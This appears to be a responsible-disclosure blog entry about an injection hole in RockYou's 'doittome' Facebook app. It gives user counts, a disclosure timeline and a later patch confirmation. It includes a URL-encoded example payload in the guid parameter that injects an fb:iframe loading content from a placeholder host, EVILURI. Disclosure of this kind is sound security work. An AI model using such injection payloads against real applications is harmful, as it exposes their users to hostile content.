Current Monthly Active Users: 3,157,995
Current Rank on Application Leaderboard: 55
Application Developer: RockYou
Responsiveness: I notified RockYou and Facebook of this hole on Sep. 14th, and have reminded Facebook a few times since that it remains unpatched. I’ve received no communication from RockYou. Update: Facebook contacted me again this evening and said RockYou had deployed a patch, which I have confirmed.
Vulnerability Status: Unpatched Patched Sep. 30
Example URI: http://apps.facebook.com/doittome/refreshAd.php?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E
Share with your friends!